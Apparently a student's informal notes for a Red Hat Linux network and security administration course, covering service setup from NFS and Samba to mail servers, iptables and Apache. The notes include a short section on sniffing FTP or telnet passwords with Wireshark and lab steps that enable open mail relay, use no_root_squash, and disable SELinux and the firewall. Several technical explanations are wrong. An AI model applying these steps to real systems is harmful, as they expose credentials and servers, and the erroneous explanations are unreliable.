Notes for personal use : RH- 253 LINUX NETWORK & SECURITY ADMINISTRATION ( HOW DOES THE SERVER CONFIGURATION) 1. introduction to services : services : background processes / daemons 3 types of services :: 1) init base services 2) system base services 3) xinet based services. 1) server the services from init.d file 2) network based services. 3)---- # ls /etc/init.d (whatever daemon available in this services.) How to check a status of services Syntax : # service < service name > status # service vsftpd status To start services # service < service name > start # service < service name > stop # service < service name > restart # service < service name > reload * xinetd based services x – extra inet – internet d – services # /etc/xinetd.d # ls /etc/xinetd.d ( list the xinetd.d) Particular setting of particular file is configuring . The configuration file for xinet based service. # vi /etc/xinetd. conf Service xyz status cannot be used for xinetd based services # service xinetd restart # service xinetd stop * common configuration file for all xinetd based services. # vi /etc/xinetd.conf o/p define general logging characteristics * log_type = SYSLOG daemon info : whatever any client telnets to the server then it’s going to record that particular /var/log/messeges * log_on_failure = HOST : incase of failure for telnet from client server is going to record only the IP address of client on the /var/log/messegess of the server * log_on_ success = PID HOST DURATION EXIT : whenever the client successfully telnets to the server then it is going to record the process ID, HOSTNAME, DURATION, when the HOST has exited it is going to record these action /var/log/messeges of the server Define access restriction defaults CPS = 50 10 Speci - : connection per second if there are more than 50 client attached at aa time then server will not except new connection for next 10 second Instance = 50 Speci : 50 client can telnet to the server at a time Per _ source = 10 Speci : this time given by the server to the client to accept that new connection . How to install and configure a telnet service C –nodeps # rpm –ivh ftp://192.168.0.254 :/pub/RHEL5/Server/telnet- server *.rpm Telnet configuration file # vi /etc/sinetd.d/telnet disable = no X yes tells the status of telnet if no telnet is on if yes telnet is off to see the changes disable = no put-yes at line no 12 . :wq! # service telnet restart # telnet 192.168.0.2 25 port no. # quit HELO cracker.org Quit 4) service telnet :- 5) { :- 6) flags = REUSE :- \7) soket_type = stream :- TCP/IP based services 8) wait = NO :- multi tasking service i.e no of client can get attached to the telnet server 9) user = root :- owner of the telnet server. 10) server = /usr/sbin/in.telnet :- main executable file 11) log_on_failure + = USERID :- whenever there is failure of telnet of client then it is going to recording of UID in the /var/log/messeges. # chkconfig httpd in # chkconfig –list | less On:- tells u that service is automatically going to be started in that particular runlevel # chkconfig –list httpd To list the status of single services # chkconfig httpd off To stop particular service # chkconfig httpd of To on particular service # chkconfig httpd –del To destroyed the connection between chkconfig & service . * how to see current runllevel # runlevel o/p n -3 10th oct Unit -3 NFS SERVER System v services :- ( basic networking services ) # Service portmap restart # Service nfs restart 1) Network file system 2) To client one or more directories or client. RPC : - Remote Procedural call services RPC Services * system v services 1) service portmap restart 2) service nfs restart port no for nfs 2049 (fix) for portmap 111 configuration file # vi /etc/exports Directory to be share h/w address through which extra attribute Dir to be shared argument Lab 1) NFS (I) Server side Step Steps : - # ssh station X Then built a directory for sharing # mkdir –p /xyz # cd /xyz Open the directory # touch a,b,c put some file # Cat > aaa # ls (list the containt) # cd ( come back to home directory) # vi /etc/exports /xyz 192.168.0.0/255.255.255.0(rw,sync,no_root_squash) Class b n/w class c n/w :wq! Speci :- 1) xyz – directory to be shared 2)192.168.0.0-- all the machine in the lab 3) 255.255.255.0 -- class c n/w 4) rw-- read & write 5) sync -- make changes immediately 6) _root_squash-- treat client root user server root user # exportfs –r : refresh the export list # service portmap restart # service nfs restart * client side steps # ssh station X # showmount –e 192.168.0.5 ( it shows the extended list of the server) # Mkdir –p /share (make a dir on which share is mounted) # mount –t nfs 192.168.0.5:/xyz /share ( mount the type of share nfs of 192.168.0.5:/xyz /share directory) # mount # cd /share (go to the share dir) # ls # cat > aa # ls # cd # umount /share # cd xyz # ls * how to share 2 machine in the lab ( extra client side step) # vi /etc/exports /xyz 123.456.789.123(rw,sync) 123.456.789.123(rw,sync) :wq! # exportfs –r (refresh the list) # service portmap restart # service nfs restart # mkdir –p /share # mount –t nfs:123.456.789.123:/xyz /share # mount # cd /share # umount /share * how to share a single machine # vi /etc/exports /xyz 123.456.789.123 ( rw,sync) :wq! * sharing the machine example .com # vi /etc/exports /xyz *.example.com (rw,sync) Or /xyz station1.example.com ** extra client side step # mount –r nfs –o soft 123.456.789.123:/xyz /share (terminate u’r programme cleanly) Soft:- if nfs server is shutdown after mounting the share an while accessing the share terminal will hang. # service nfs restart # mount –t nfs –o hard 123.456.789.123:/xyz /share # service nfs restart Hard: in above situation the terminal will hang till nfs service on this sever started begin. # mount –t nfs –o intr 123.456.789.123:/xyz /share Intr : if the nfs server is shutdown while mounting the share then the client terminal will not hang # mount -t nfs –o resize=8192 123.456.789.123:/xyz /share Rsize = 8192 : read 8 line faster from the server by default speed is a 1024 bytes. # mount –t nfs –o wsize=8192 123.456.789.123:/xyz /share Wsize=8192: write 8 time faster. * how to move NFS share permanent on client client side step # vi /etc/fstab 123.456.789.123:/xyz /share nfs defaults 0 0 :wq! # reboot FTP SERVER : 1) file transfer protocol 2) functions : download file --> - server -->client uplod a file --> - server -->client 3) it’s configuration file #vi /etc/vsftpd/ vsftpd.conf 4) system v services # service vsftpd restart Port no : 21 Login 2 types 1) anonymous 2) any linux user a) password is not compulsory. a) password is compulsory. b) home dir /var/ftp b) home dir =/home/username c) by default u download the file c) download a file as well as upload a file * LAB SEQVENCE : Anonymous login: # vi /etc/vsftpd/vsftpd.conf Conf: file for ftp server # ftp 123.456.789.123 #anonymous # Passwd # ls #quit # ftp login # # quit Login using any linux user # useradd abc # passwd abc # ftp server1 Name # abc Passwd# abc * uploading file # ftp server1 #abc Abc # mput install.log # y #ls # rm install.log (change the pwemission form) ftp> # quite * how to disabled anonymous login # vi /etc/vsftpd/vsftpd.conf Line no 12 – remove & replace the yes with no . Anonymous_enable = no :wq! # service vsftpd restart # ftp server1 # anonymous ftp # passwd displayed u login incorrect / login failed * how to disable all linux user # vi /etc/vsftpd/vsftpd.conf Line 12 – anonymous_enable = no / yes Line 15 -- local_enable = yes / no :wq! # service vsftpd restart # ftp server1 # abc ( ftp server is anonymous only) * how to disable only single linux user . # vi /etc/vsftpd/vsftpd.conf Line 15 -- local_enable = no / yes :wq! # vi /etc/vsftpd/vsftpd.conf Inside the list at the last line add the user which is to denied Ex.. bob :wq! # service vsftpd restart # ftp sever1 Name # bob Passwd # bob o/p login failed #quit * how to enable the anonymous user to upload file # vi /etc/vsftpd/vsftpd.conf Line no 12—keep it =yes Line no 24 – anon_upload_enable =yes Line no 46—chown_upload = yes --> remove # Line no 47—chown_username = daemon ( remove the comment ) Line non 48 – anon_umax = 077 --> to add this line. :wq! # service vsftpd restart # cd /var/ftp/ # mkdir-p inc # chown root:ftp inc # chmod 733 inc # ls –ld inc # cd # ftp 192.168.0.2 Name: ftp Passwd : #ls Cd inc ftp> mput install.log y ls quit * how to check # cd /var/ftp/inc/ # ls SAMBA SERVICES. *samba server 1) based on smb ( server message block) 2) used to access CISF (Common Internet File System) Function : used to share on or more directory across os that is . * system V services # service smb restart # conf file: vi /etc//samba/smb.conf * how to define user defined share (USD) Server Side Step: # vi /etc/samba/smb.conf In this file go to the end of the file & write down following init (patch). [myshare] Comment = mary’s and fred stuff Path = /mnt Valid users = andy Public = no Writable = no Create mask = 0765 Host allow = 192.168.0. 127. Browseable = yes Specification : - Line 1--> extra information about share Line 2 --> directory to be shared Line 3--> user allowed to access the share Line 4--> no other user then bob is allowed to access the share Line 5 --> read & write permission Line 6 --> It is not printer share Line 7 --> permission to upload file Line 8 --> allow the all machine in the lab to share Line 9 --> means client can see the share [myshare] :--> it is a name of share u can put any name of ur share that u used. :wq! # useradd andy # smbpasswd –a andy ( to access the samba server h add samba passwd to that particular user by using this command) # service smb restart # setenforce 0 # service iptables stop *client side step:-- Any station which is u’r server no. # smbclient –L 123.456.789.123 –N ( samba client list of all share machine on the server –N allows the anonymous login) # smbclient //123.456.789.123/myshare –U andy ( used to access the share of name my share & with uses ad bob) # passwd : andy Smb:\> ls Smb:\> mput test1 Y Smb:\> ls Smb:> mget test1 Y Smb:\> quit # ls –l * how to solve home dir share --> client side steps only ( there is no server site) # smbclient //123.456.789.123/andy –U andy Passwd: andy Smb:\> ls Smb:\> rm test ( if u want to delete any file from it then use this command) * how to access the printer share go to server side ---> go to the GUI --> open terminal #system-config-network Put the name & then press forward--> forward --> Apply -->go to the printer2 make it as default printer # mkdir –p /usr/spool/samba * server side step --> # setenforce 0 # smbclient //123.456.789.123/printer2 –U andy Passwd : andy smb:\> ls Smb:\> print test () for printing any file which u want) Smb:\> quit # lpr #lprm 5 ( for deleting or cancel the lprm command) * how to creat share for group --> server side step # vi /etc/samba/smb.conf write list = @ group ( share will be available to this group also) :wq! # groupadd group ( name which is written in above) # usermod –G group andy # id andy ( it shows u id for the usr bob) # service smb restart -->Client side – # smbclient //123.456.789.123/myshare –U andy SSHD SERVER:-- PORT NO. 22 * feature 1) secure shell demon (sshd) 2) called as open ssh server * functions:-- 1) to administrator to system remotely due to root login * system V services * # service sshd restart * configuration file for # vi /etc/ssh/sshd_config ( 5 packages to verify ) 1) rpm –q openssl 2) rpm –q openssh 3) rpm –q openssh_ askpass 4) rpm –q openssh- server 5) rpm –q openssh –client * how to disable root login * server side step --> # vi /etc/ssh/sshd_config (Remove the # prompt on line no.13 Then go to line no39 remove the # also from present root login replace yes by no.) * client side step s.s.h stationX * how to enable root login # vi /etc/ssh/sshd_config (to change the line 13 , 39) :wq! # service sshd restart * how to disable one or more user * server side step # useradd ost # passwd ost How to denied Vi /etc/ssh/sshd_config After 39 line add a new line Deny Users Ost :wq! # service sshd restart # ssh ost@station3 passwd : deny # vi /etc/ssh/sshd_config * how to allow one or more users # vi /etc/ssh/sshd_config Remove line no40 Allow users ost only :wq! # service sshd restart * how to add a banner to sshd server # vi /etc/ssh/sshd_config Go to line no 116 remove # from it & write a down banner /etc/myban :wq! # vi /etc/myban Hello this is my station no .3 Init :wq! # ssh station3 ( to displayed to u when login) * extra client side step / command: # ssh 123.456.789.123 # password : redhat (it shows u working directory) # sftp 123.456.789.123 DHCP SERVER Port no : 67 ( it provides the fallen system IP address particular time to access) It’s performing 2 compulsory function DHCP: dynamic host configuration protocol Compulsory function of DHCP 1) provide IP address to client automatically using i) a random IP address from the range specification ii) to provide fix IP address depending on the h/w address of NIC of client ( network Interface card – lan card) 2) to provide n/w Information to client i) like netmask of client ii) domain name of client ( example.com) iii) DNS server IP address iv) Getway IP Address * Default lease time Specification: the Ip address given by the server to the client for a specific time period ( 21600 sec) * maximum lease time speci :- this is time provided by server to client the client has to renew IP add before expiry of lease time ( 43200 sec) * reneual time : Continue to same IP address * system V services # Service dhcpd restart Configuration file : #Vi /etc/dhcpd.conf o/p line ddns-update-style none; option domain-name “example.com”; option domain-name-server 123.456.789.123; default –lease-time 21600; max-lease-time 43200; subnet 123.456.789.123 netmask 255.255.255.0 { option router123.456.789.123; option subnet-mask 255.255.255.0; range 123.456.789.10 123.456.789.20; Host station1 { hardware ethernet 00:0F:EA:9D:71:AB; fixed address 123.456.789.123; } Host station2 { hardware ethernet 00:0F:EA:9C:AF:04; fixed address 123.456.789.123; } Host station3 { hardware ethernet 00:0F:EA:9D:99:64; fixed address 1123.456.789.123; } Host station4 { hardware ethernet 4C:00:10:53:0D:5E; fixed address 123.456.789.123; } Host station5 { hardware ethernet 00:0F:EA:9D:98:B8; fixed address 123.456.789.123; } Host station6 { hardware ethernet 00:50:BA:A8:7B:B8; fixed address 123.456.789.123; } * 10 service security /service firewall TCP wrappers / Host Based security. * there is two configuration file : # vi /etc/hosts.deny # vi /etc/hosts.deny syntax for both the above file there are in 3 comumns ----------------:----------------:-------------- 1/more 1/more optional * how to configure hosts deny file : server side steps : # vi /etc/hosts.deny Here addd the entire like : Vsftpd : 123.456.789.123 :wq! # service vsftpd restart * client side step # ssh 123.456.789.123 # ftp station1 So it should gives the error :- Connected to service not available * if you want to deny all the machine from using vsftpd then in the deny file i.e in # vi /etc/hosts.deny Write here Vsftpd : 192.168.0.0. /255.255.255.0 then :wq! # ssh station6 # ftp server1 Or # also you can write ALL in place of 192.168.0.0 / 255.255.255.0 Or # station2.example.com Or # ALL EXCEPT *.example.com * to deny more than 1 services in host deny file vsftpd, sshd : 192.168.0.2 * to deny all service for all machine in the lab in the host deny file write ALL:ALL :wq! * configuration of file host.allow :-- ( it mails you the details like who has done ssh/ftp etc/ to you machine) * now in the file host.allow write : sshd :ALL: spawn echo “login attempt from % c to % s” | mail –s “WARNING ” root Meaning of above line -sshd : execute programme on server -echo : display messege - % c : client - % s : server - mail : send a mail to root with subject “WARNING” Then save it by :wq! * client side steos: # ssh 123.456.789.123 #mail SQUID SERVER 19/10/2007 Port no. :3128 * proxy server : A proxy server is a server that acts as a intermediately between the workstation user & the internet so that on enterprise can ensure security administrative control & caching services. * a proxy server is associated with a * getway server that separates the enterprise network from the outside network & a firewall server that protects the enterprise network from outside threats * when using a proxy server the user is connected to the server & not the proxy acts as a client on the behalf of user * it uses % of its own IP address to required the page located on the N/W once the page is returned the proxy server forwords it to the user isolation then from the internet. Functions: 1) communication between LAN & ethernet 2) used in cybercafés * feature : proxy server in linux is called as a squid server. * system V services # service squid restart Port no 3128 Conf file : # vi /etc/squid/squid.conf By default squid can’t receive request from remote machine. * lab sequence how to receive request from all of the machine in the lab also give http.port no as .: 8080 *server side step # vi /etc/squid/squid.conf Go to the line no. 2410 and add Acl example src 192.168.0.0/24 or An like 192.168.0.254/255.255.255.0 ( acl : access control list) :wq! * example : - name of the group ( it can be any) * scr :- source ( to be whom he has give the access) * 192.168.0.254/24 or 192.168.0.254/255.255.255.0: -- class c networks Go to the no 2527 & add a new line Which is : http_access allow example * http_access : to allow the http request * example : to gr. (example) for which the permission is to e given :wq! # service squid restart * client side steps : # ssh stationX # squidclient –h 192.168.0.1 –p 3128 You should get an html page after giving the above command. # squidclient –h 192.168.0.1 –p 3128 http://yahoo.com You should get a waiting page * how to deny/ block certain website with the help of a proxy server. * server side step : # vi /etc/squid/squid.conf * Go to 55% of your screen or line no. 2410& add following:-- Acl otherguys dstdomain .yahoo.com Acl otherguys dstdomain .hotmail.com ( here you’ve to add deny & follow group line 1 below the other) * then go to the line no 2526 add: http_access deny othereguys ( deny http access to the group “otherguys”) :wq! # service squid restart # squidclient –h 192.168.0.1 –p 3128 http://yahoo.com You get on html page with “Access denied ” error If you give google.com ( in the place of yahoo.com) then it will give a waiting page * how to change port no 8080 # vi /etc/squid/squid.conf To go line no 71. & give http_port 8080 :wq! * client side step # squidclient –h 192.168.0.1 –p 8080 http://google.com It gives u waiting page * to configure mozilla to contact proxy server * client side step : # startx Go to the mozilla firefox general --> edit-->preferences-->connection-->setting-->select direct to connection to the internet. * To get mails on the client from server on the client go to edit-->preference -->direct connection to the internet --> give IP address of server & port as 8080--> select the option below – ok SECURITY CONCERS & POLICIES * TYPE OF SECURIETTY : n/w firewall services PAM DIFFERENT Pluggable authentication module room ar main server in organization D DOS ATTACKS ( DENIEL OF SERVICES ) :-- *DDOS ATTACK (distributed denial of services) * A “denial- of service” attack is characterized by an explicit attempt by attackers to prevent legimate user of service from using that service. Example includes . * Flooding a network, thereby prevent legimate network traffic ; * Disrupting a sever by sending more request than it can possibly handle there by preventing access to a service * Preventing a particular individuals from accessing a service ; * Disrupting service to a specific system or person --> attack can be directed at my network device including attack on routing device and web electronic mail, or domain name system server * TCP/& UDP ( protocol) TCP UDP 1) transmission control protocol 1) user defined protocol 2) n/w connection is required 2) no need of connection 3) 1st established connection 3) no need of establishing connection & then refers data. 4) no threat of data loss 4) threat of data loss 5) same as telephone 5)same as sending a postcard 6) slower than UDP 6) faster than TCP * LAB SEQUENCE : # netstat –taupe | less ---shows network status of all the local machine -t : list of all TCP connection a : give details of all connection u : details of UDP connection p : PID of services running e : extended information about the services proto : i.e protocol either TCP or UDP user : owner of the service running . PID : process ID of the service . Program name : It is the server name Foreign add : client IP address State : status of connection. LISTEN : service is ready but there is no client to accept the service. Established : connection established between server & client *.* : no client attached to the service # nmap –po 192.168.0.2 Nmap : network mapping or statues of remote machine. -po : disabled pinging . 1) wireshark 2) wireshark-gnome – INSTALL THESE 2 PACKAGE. * how to hack password of FTP or telnet using the wireshark step: --> startx--> application--> go to wireshark network analize --> an go to capture--> go to interface the go to --> pseudo-->device that capture the all interface --> pres the start --> ok open terminal--> ftp station2 II ..PAM Pluggable authentication modules. 1) pluggable :- plug & play s/w or h/w 2) modules : set of complied function 3) authentication : - here u name to provide username + passwd + other parameters # ls /lib/security/ Supporting files always stored with extension as .so Name of the file meaning/function configuration file 1) pam_unix.so when username entered at the login prompt I ask and check a passwd. 2) pam_securetty.so 2) user to lock or unlock console. # vi /etc/security Lock console with # go to console & remove the # from on the console 3) pam_nologin.so 3) conf file # vi /etc/nologin (empty) Allow only root user not for non root user Touch /etc/nologin if this file is allowed to login as a non root user lab: # touch /etc/nologin # ls /etc/nologin Go to another console try to login as non root -- if not able to login then go to root user & Remove /etc/nologin file as # rm /etc/nologin 4) pam_chroot.so 4) this file is operate in rescue mod Chroot /mnt/sysimage 5) pam_console.so 5) it will give reboot an halt permission for Non root users. 6) pam_env.so 6) it will create environmental variable or System variable whenever you login Ex. Set | less 7) pam_ftp.so 7) whenever u login with the help of ftp to the server it’s going to ask u to u to provide name & password 8) pam_group.so 8) whenever new user is added it will Automatically cret UPG-(user private group) 9)pam_issue.so 9) conf file is # /etc/issue --> issues a kernel version 10) pam_mail.so 10) it will show message u have mail At login 11) pam_mkhomedir.so 11) whenever new user is created it is Automatically create home dir for user 12) pam_motd.so 12) in conf-n # vi /etc/motd Message of the day 13)pam_rootok.so 13) whenever a non root-user resize to To give an administrative command It will ask for root passwd (authconfig) 14)pam_smb_auth.so 14) it will enable samba authentication ( the smb client command) 15)pam_smbpass.so 15) it will stored samba password in a File using smbpasswd command 16) pam_time.so 16)it will enable time base access for all Xinetd base services. 17) pam_umask.so 17) it will automatically set umask of user. * how to create a power user :-- # useradd tom # passwd tom # which authconfig –tui /usr/sbin/authconfig--> # vi /etc/sudoers Go to the line no.21 an add a line User_Alias U = tom Speci:- (create an alias for user tom as capital U) Go to line no 28 Cmnd_Alias C = /usr/sbin/authconfig-tui Speci:- (create a shortcut capital C for the command authconfig-tui) Then go to the line no-77 an add U ALL= C Speci:- (tom user from all the consoles can create the authconfig command) :wq! * login with tom user sudo /usr/sbin/authconfig-tui passwd : tom ( authconfig – tui --> directly going) IMP: * how to give grub passwd # grub-md5-crypt Passwd = redhat (which u want to crypt) Change console --> then open file # vi /boot/grub/grub.conf Go to time out line below the line is Password –md5 ( go to 1 console to get crypted password select The crypted password with mouse right click -go to second consol & press left mouse button and Paste a crypted passwd after –md5 then wq! Reboot) :wq! # reboot System monitoring 1)# df –H Disk free size in human readable fashion 2) # sf –h disk free size in system manner 3) # du /etc/ -H It shows disk usages of /etc directly in human redable fashion 4) # df –sh Disk usages summery of /etc directory in human redable fashion. 1) find /-type -perm +600 find in /directory a type of file having ( special permission 6000) 6) find / -type f -perm o+w Other having write permission find in /directory a type of having write permission of other . 2) find /home –type f –nouser -o – nogroup * situation in which this type of file is created steps # useradd test # passwd test #Ls –ld /home/test/ Then # find /home –type f –nouser -o- nogroup * log files of linux 1) tail /var/log/messages ( mail log file) it consist of system messages 2) tail /var/log/secure : user , group, telnet, ssh related login messages. 3) tail /var/log/maillog : (e mail related ) i.e incoming or outgoing messages or email 4) tail /var/log/dmesg. Kernel related messeges 5) tail /var/log/xferlog 6) tail /var/log/transfer log # logwatch # mail # rpm –q psacct * --> check pack Rpm-ivh # rpm –q systat --> system statistic # rpm –ivh ftp://192.168.0.254:/pub/RedHat/RPMS/sysstat * rpm. * package for system status & process accounting # ac –p person wise wages for system in hours # ac –d . daywise usages of system. # ac –pd usage of a/c persent & day wise # accton /var/account/pact Turn on the accounting for the system #accton --> turn off accounting # last --> # lastcomm --> #Rpm -ivh ftp://192.168.0.254:/pub/RedHat/RPMS/ rhce -< packname> *.rpm #Rpm -ivh ftp://192.168.0.254:/pub/RHEL5/ rhce -< packname> *.rpm 4. EMAIL SERVER 25TH OCT 07 PORT NO:. 1) sendmail 2) postfix 3) imap 4) pop * how does email works on Internet :-- 1) MUA : mail user agent This is obtained when the user who want’s to send a mail open up his account by providing him login name and passwd. (account page of user) 2) MTA : mail transfer agent Mail transfer agent is a part of e-mail system that does much of the working of transferring the e-mail message from one computer to another. ( either on same local network or over the internet to a remote system) 3) MX : mail exchanger 4) SMTP : simple mail transfer protocol. 5) MX : mail exchanger 6) MDA: mail delivery agent This is transfer u’r mail from mail box. 7) MAA : mail accessing agent Use to access u’r mail from 8) MTA : mail transfer agent 1) Sendmail Server :- Features :-- ii) Sendmail is the MTA ( Mail Transfer Agent) iii) System v services # service Sendmail restart iv) port no.: 25 v) configuration file . # vi /etc/mail/Sendmail.mc ( macros) * what is macro --> macros are a great productivity tool it allow up to run a series of action with a click of a button a macro is a set of task combined together so that u can run or reply the entire task together with a single command. vi) b default Sendmail cannot receive email from remote machine but it can send emails to remote machine . IMP: * LAB SEQUENCE : * How to receive a email from remote machine . * server side step— # cd /etc/mail # vi Sendmail.mc Go to line no 116. Before:--> DAEMON_OPTIONS(‘port=smtp,addr = 127.0.0.1, NAME = MTA’) dnl After :--> dnl DAEMON_OPT IONS(‘port=smtp,addr = 127.0.0.1, NAME = MTA’) dnl 3) DAEMON OPTIONS :- 4) Port = smtp – use port no. 25 5) Addr= 127.0.0.1 – loopback IP add 6) NAME=MTA – use Sendmail as mail transferring agent. :wq! # m4 sendmail.mc > Sendmail.cf # service Sendmail restart * client side setup * how to heck above configuration # ls –l | mail –s “ hello root” root@ station2.example.com # mail * how to create alias for the user # server side steps # vi /etc/ aliases Go to end of the file Ost: root :wq! # newaliases Refresh the list of aliases # service Sendmail restart * client side setup * ls –l | mail –s “aliases ” ost@station2.example.com go to the server side # mail * aliases are used to hide identity of server * how to enable open realy feature * server side steps # cd /etc/mail Open conf file # vi Sendmail.mc Go to the line no 84 & add a line FEATURE ( promiscuous_relay) dnl :wq! # m4 sendmail.mc > Sendmail.cf * client side # telnet 192.168.0.2 25 HELO example.com MAIL FROM : hello@example.com Sender ok RCPT TO : root@station2.example.com Recipient ok DATA : SUBJECT : “Sendmail server ” (give any sub) Today we are going to study A mail server & we understand that The how to create an aliases . . Quit Then go to the server # mail (to displayed u mail list then u read after the mail will be goan) 26/10/07 POSTFIX :-- ( Also mail transferring Agent) Feature of postfix – Postfix is a type of MTA ( mail transfer agent ) It is alternative for the Sendmail System V services. # service postfix restart Port no: 25 as it as Sendmail # postconf –e “option = value” By default postfix cannot receive mail from remote machine but can Sendmail to the remote machine LAB SEQUENCE : How to receive e-mail from remote machine. * server side steps . # rpm –q postfix -- check package If packeges is not install 1st install the package by yum /rpm # alternatives –config mta Select postfix service 2 # service postfix restart # postconf –e “ inet_interfaces = all” Speci:- edit the configuration of postfix such that it except mails from all of the machine in lab # service postfix restart * how to check above configuration client side steps : # ls –l | mail –s “hellooooo” root@station2.example.com * how to create an alias serve side step --> open conf file # vi /etc/aliases Put the end of the file Ost: root :wq! # newaliases ---refresh the list # service postfix restart. Go to the client side give command # ls –l | mail –s “hii” ost @station3.example.com Then go to the server side # mail You should get a mail * how to enable open raly features # postconf –e “mynetworks_style = subnet ” # service postfix restart Then go to the client side step # telnet 192.168.0.3 25 ( c types of port) HELO: example.com MAIL FROM: xyz@example.com RCPT TO: root@station3.example.com DATA SUBJECT : “postfix server” Here u put some text which is u want To type any kind of line u want to . . Quit * Then go to the server # mail should get a mail 1) POP : post office protocol 2) IMAP : Internet mail access protocol 3) Functions : to receive mail remotely server to client System v services # service dovecot restart # vi /etc/dovecot.conf Port no for POP 110 Port no for IMAP is 143 Go to the line no 17 then remove # Server side step # service dovecot restart # vi /etc/dovecot.conf Removing # from line no 17 :wq! #service dovecot restart * how to check mail for POP server * add user # useradd champ # passwd champ # ls | mail –s “hello” champ # telnet 192.168.0.3 . 110 USER champ PASS champ STAT RETR 1 mail no (retrieve) DELE 1 mail no QUIT * how to check IMAP services /server go to the client # mutt –f { bob@station3.example.com/ssl} (bob any user u sendmail) (# su –champ # mail) * NETWORK FIREWALL * WHAT IS IPTABLES ? Iptables is the user space command line programme used to configure the linux IPV 4 packets filtering rule set. It is targeted towards system Administrators. Since network address translation is also configured from the packet filter ruleset Iptables is used for this too. The Iptables package also include ip6tables. Ip6tables is used for configuring the IPv6 packets filter. * how to disabled a firewall # service Iptables stop ( disable network firewall) Configuration of firewall. # Iptables -A INPUT –s 192.168.0.2 –j DROP Meaning: 1) Iptables -->this command is configuring the firewall 2) –A --> appends or add the rule in list 3)INPUT --> INPUT traffic 4) –s --> source 5) –j DROP --> jump to DROP * block or DROP incoming traffic coming from the source the ( 192.168.0.2) particular IP address # Iptables –nL Numerically list all of the rules in firewall # Iptables –A INPUT –s 192.168.0.2 –j REJECT. REJECT --> on the client side it will issue an error message. * how to add a rule at particular position # Iptables –I INPUT3 -s 192.168.0.3 –j DROP # Iptables –nL * how to delet all the rules at once # Iptables –F INPUT F --> flush a 1 of the rule from INNPUT traffic or delete all of the rule from INPUT traffic. * to deny all at once # Iptables –p INPUT DROP * to accept from particular machine # Iptables –A INPUT –s 192.168.0.2 –j Accept --> accept the traffic from source 192.168.0.2 # Iptables –p INPUT ACCEPT Accept from all the machine # Iptables –nL * DROP TRAFFIC from entore lab # Iptables –A INPUT –s 192.168.0.0/24 –j DROP * if u want to drop traffic from lan card # Iptables –A INPUT –I eth –j DROP Speci:-Add an incoming interface fist lan card i.e wth0 and drop its traffic # Iptables –A OUTPUT –o eth0 -j DROP Speci:- add rule in outgoing traffic for the lan card * how to stop a ping command # Iptables –A INPUT –p icmp –j DROP –p ( protocol) Icmp --> inet control message protocol with the help of this command no client To the ping to the server. * how to stop ssh service on server # Iptables –A INPUT –p tcp –dport22 –j DROP TCP – transmission control protocol --dport22 – means destination port 22 no machine can ssh to server * how to apply policies a particular user * # Iptables –A OUTPUT –m owner –uid – owner 502 –j DROP -m modules ( supporting files) --uid –owner 502 --> means the owner having uid 502 --drop the output traffic for the owner with uid 502 * how to drop 1st pocket coming from input traffic i.e none of the client can’t access any of the services to u’r machine # Iptables –A INPUT –m state –state NEW –j DROP * all of the rules in firewall are stored in RAM on temporary bases to make it permanent on the machine following thing are carried out. # service Iptables save # vi /etc/sysconfig/Iptables. * removing the permanent rules # rm –rf /etc/sysconfig/Iptables . 30th oct 2007 IMP: APACHE SERVER Features 1) Apache 2 --> Version 2) It Is A Type Of Web Server 3) Works On Http: http : Hyper Text Type Protocol FUNCTIONS OF APACHE SERVER - to host one or more website on a single server * system v services # service httpd restart Configuration file # vi /etc/httpd/conf/httpd.conf Port no.: 80 LAB SEQUENCE : * how to configure default website using apache website * server side step : open conf file: # vi /etc/httpd/conf/httpd.conf Go to line.: 57 --> ServerRoot “/etc/httpd” (it’s configuration directory of server) Go to line.: 134 --> listen 80 (port no of apache web server) Go to line .:230--> User Apache (it’s owner of apache server) Go to line.:231--> Group apache( group owner of apache sever) Go to line.:250--> ServerAdmin root@stationX.example.com (Administrative sever is root) Go to line 264--> ServerAdmin root@stationX.example.com (simple server name) Go to line 280--> DocumentRoot “/var/www/html”(document root of apache server) * go to the end of file.: * Add this following patch— 1) <VirtualHost 192.168.0.1> 2) ServerAdmin root@station2.example.com 3) DocumentRoot /var/www/html 4) ServerName station2.example.com 5) ErrorLog logs/station2.example.com-error_log 6) CustomeLog logs/station2.example.com-access_log combined 7) <Directory /var/www/html> 8) Options Includes Indexes 9) </Directory> 10) </VirtualHost> Patchline1—start of default website Patchline2—administrative of website Patchline3—document root of apache server Patchline4—name of the website Patchline5—whenever any error in website it will record those error in this log file. Patchline6—custom log whenever any client excesses the website it will stored the excess log in this fiel Patchline7—combined – syntax Patchline8—start of directory option Patchline9---includes it will enable server side programmes. Patchline10—indexes if there is no index .html page or file in document in subdirectory of document root it will displayed listing of all other html file in a client :wq! # cd /var/www/html/ # ls # vi index.html HELLO..! THIS IS THE DEFUALT WEBSITE FOR APACHE WEB SERVER :wq! # service httpd restart * client side steps # links http://station2.example.com (if gor a error remote host identification change do this steps— # rm –rf .ssh/known_hosts) * how to configure a virtual website open conf file— # vi /et/httpd/conf/httpd.conf Keep line no. 57,134,230,231 will remain the same (as for server) Then go to the line no .: 250 make it change --> ServerAdmin root@www2.example.com * go to line no. 264 -->ServerAdmin www2.example.com.:80 Then go to end of file— NameVirtualHost 192.168.0.2 <VirtualHost 192.168.0.2> ServerAdmin root@www2.example.com DocumetRoot /var/www/virtual/html ServerName www2.example.com-error_log CustomeLog logs/www2.example.com-access_log combined <Directory /var/www/virtual/html> Options Includes Indexes </Directory> </VirtualHost> :wq! (#httpd -t --> syntax ok) # mkdir –p /var/www/virtual/html #cd /var/www/virtual/html # vi index.html THIS IS THE VIRTUAL WEBSITE :wq! # service httpd restart *client side step Links http://www.example.com * how to run CGI programme in website & display out put in client browser CGI --> common Getway Interface * CGI programme are use to run server programme on client browser * server side step # vi /etc/httpd/conf/httpd.conf Go to the remaining patch same and add this line (above directory type) --ScriptAlias /cgi-bin/ /var/www/virtual/cgi-bin/ * /cgi-bin/ :-- logical path while running a shell script /var/www/virtual/cgi-bin/ * /var/www/virtual/cgi-bin Physical path will running a shell script :wq! # Mkdir –p /var/www/virtual.cgi-bin/ # Cd /var/www/virtual.cgi-bin/ # ls # vi test.sh ( write the following script ) #!/bin/bash Echo Content-Type : text/html Echo echo echo “<pre>” echo “my user name is: $(whoami)” echo echo echo “the date is:” date echo echo “<pre>” echo “the cal is:” echo echo “</pre>” :wq! Explanation :. 1) command interpreter is the bash shell 2) output in the form of html 3) add a blank line 4) start of pre formatted tag 5) automatically add line breaks or page breaks end of pre formatted tag # chmod a+x test.sh # service httpd restart * client side steps. #Links http:// www2.example.com/cgi-bin/test.sh * how to protect website by user name & website * Server side step:- # cd /var/www/virtual/html/ # ls # ls –al # vi 